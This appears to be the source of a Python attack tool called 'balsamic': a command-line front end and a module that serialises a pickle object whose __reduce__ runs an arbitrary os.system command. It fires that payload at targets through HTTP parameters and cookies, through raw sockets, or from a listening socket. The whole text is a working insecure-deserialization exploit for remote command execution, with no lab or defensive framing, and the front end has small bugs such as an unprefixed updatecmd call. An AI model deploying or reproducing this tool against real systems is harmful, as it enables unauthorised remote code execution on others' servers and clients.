import balsamic
if __name__ == "__main__":
    # Importing argparse
    import argparse

    # Define the parser function
    def parser():
        
        # Create the base argument parser
        parser = argparse.ArgumentParser(description="balsamic args")
        subparse = parser.add_subparsers(dest="attack")

        # Create subparsers for different attacks
        webreqparser = subparse.add_parser("webreq")
        webreqparser.add_argument("-m", "--method")
        webreqparser.add_argument("-u", "--url", required=True)
        webreqparser.add_argument("-p", "--parameter")
        webreqparser.add_argument("-co", "--cookie")
        webreqparser.add_argument("-P", "--payload", required=True)
        webreqparser.add_argument("-c", "--command")
        webreqparser.add_argument("-H", "--headers")  # New argument for custom headers

        socksendparser = subparse.add_parser("socksend")
        socksendparser.add_argument("-rh", "--rhost", required=True)
        socksendparser.add_argument("-rp", "--rport", required=True)
        socksendparser.add_argument("-P", "--payload", required=True)
        socksendparser.add_argument("-c", "--command")
        socksendparser.add_argument("-s", "--steps", default="0")
        socksendparser.add_argument("-e", "--encode", action="store_true")

        socklistenparser = subparse.add_parser("socklisten")
        socklistenparser.add_argument("-lp", "--lport", required=True)
        socklistenparser.add_argument("-P", "--payload", required=True)
        socklistenparser.add_argument("-c", "--command")
        socklistenparser.add_argument("-s", "--steps", default="0")
        socklistenparser.add_argument("-e", "--encode", action="store_true")
        
        # Return parsed arguments
        args = parser.parse_args()
        return args

    args = parser()
    if args.command:
        updatecmd(args.command)

    # Extract custom headers from the arguments
    try:
        custom_headers = dict([header.split(":") for header in args.headers.split(";")]) if args.headers else None
    except AttributeError:
        pass
    if args.attack == "webreq":
        balsamic.webreq(args.method, args.url, args.payload, args.parameter, args.cookie, custom_headers=custom_headers)
    elif args.attack == "socksend":
        balsamic.socksend(args.rhost, args.rport, args.payload, args.encode, args.steps)
    elif args.attack == "socklisten":
        balsamic.socklisten(args.lport, args.payload, args.encode, args.steps)



import pickle
import base64
import requests
import socket
import argparse

class Utility:
    command = ""

    @staticmethod
    def b64pickle(payload):
        p = getattr(Payloads, payload)
        return base64.b64encode(pickle.dumps(p()))

    @staticmethod
    def urlpickle(payload):
        p = getattr(Payloads, payload)
        return base64.urlsafe_b64encode(pickle.dumps(p()))

    @staticmethod
    def plainpickle(payload):
        p = getattr(Payloads, payload)
        return pickle.dumps(p())

class Payloads:
    class oscmd:
        def __reduce__(self):
            import os
            return (os.system, (Utility.command,))

def updatecmd(new_cmd):
    Utility.command = new_cmd

def webreq(method, url, payload, param=None, cook=None, custom_headers=None):
    methods = ["get", "post", "put", "patch"]
    headers = custom_headers or {}
    payload = Utility.urlpickle(payload)
    payload = payload.decode("utf-8")
    if method in methods:
        request_method = getattr(requests, method)
    if param:
        data = {param: payload} if method != "get" else {}
        response = request_method(
            url,
            params={param: payload} if method == "get" else None,
            data=data,
            cookies={cook: payload} if cook else None,
            headers=headers
        )
    else:
        response = request_method(
            url,
            cookies={cook: payload} if cook else None,
            headers=headers
        )
    return f"Firing webreq attack against {url}"

def socksend(rhost, rport, payload, enc, steps=0):
    rport = int(rport)
    steps = int(steps)
    payload = Utility.b64pickle(payload) if enc else Utility.plainpickle(payload)
    with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
        s.connect((rhost, rport))
        for _ in range(steps):
            s.sendall(b"arb")
            s.recv(1024)
        s.sendall(payload)
        s.close()

def socklisten(lport, payload, enc, steps=0):
    lport = int(lport)
    steps = int(steps)
    payload = Utility.b64pickle(payload) if enc else Utility.plainpickle(payload)
    with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
        s.bind(('localhost', lport))  # Bind to localhost or a specific IP address
        s.listen(1)
        conn, addr = s.accept()
        with conn:
            for _ in range(steps):
                conn.sendall(b"arb")
                conn.recv(1024)
            conn.sendall(payload)
            conn.close()

